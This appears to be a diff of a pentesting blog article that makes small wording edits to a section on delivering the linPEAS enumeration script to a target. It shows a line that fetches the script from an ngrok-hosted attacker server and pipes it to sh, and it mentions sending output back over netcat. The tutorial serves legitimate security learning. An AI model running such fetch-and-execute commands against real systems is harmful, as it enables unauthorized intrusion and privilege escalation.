CyberEthicalMe/blog-articles/ckos5ch390c3bbws15qzh85bq.md

 $ python3 -m http.server 80 #python -m SimpleHTTPServer 80
 ```

-And from the target server I request the script using the external HTTP address `ngrok` generated - in this example it is `http://01513f63ed1d.ngrok.io`
+And from the target server, I request the script using the external HTTP address `ngrok` generated - in this example it is `http://01513f63ed1d.ngrok.io`

 ```sh
 $ curl http://01513f63ed1d.ngrok.io/linpeas.sh | sh
 ```

-Of course, you can also `curl` it from the Github - but it is always safer to use something verified (`linPEAS` is often updated which can lead to some [unwanted results](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/))
+Of course, you can also `curl` it from the GitHub - but it is always safer to use something verified (`linPEAS` is often updated, which can lead to some [unwanted results](https://www.offensive-security.com/offsec/understanding-pentest-tools-scripts/))

 ## Redirecting output to the host

-Useful trick is redirecting output of the script to your host.
-This is useful technique not only for linPEAS but for every other tool, script or a command you want to have the output of on your host.
+A useful trick is redirecting the output of the script to your host.
+This is a useful technique not only for linPEAS but for every other tool, script or a command you want to have the output of on your host.
 This requires `netcat` to be on the target server.

 > Well, hypothetically because you can serve a `nc` binary and download it the same way as you do with the linPEAS script.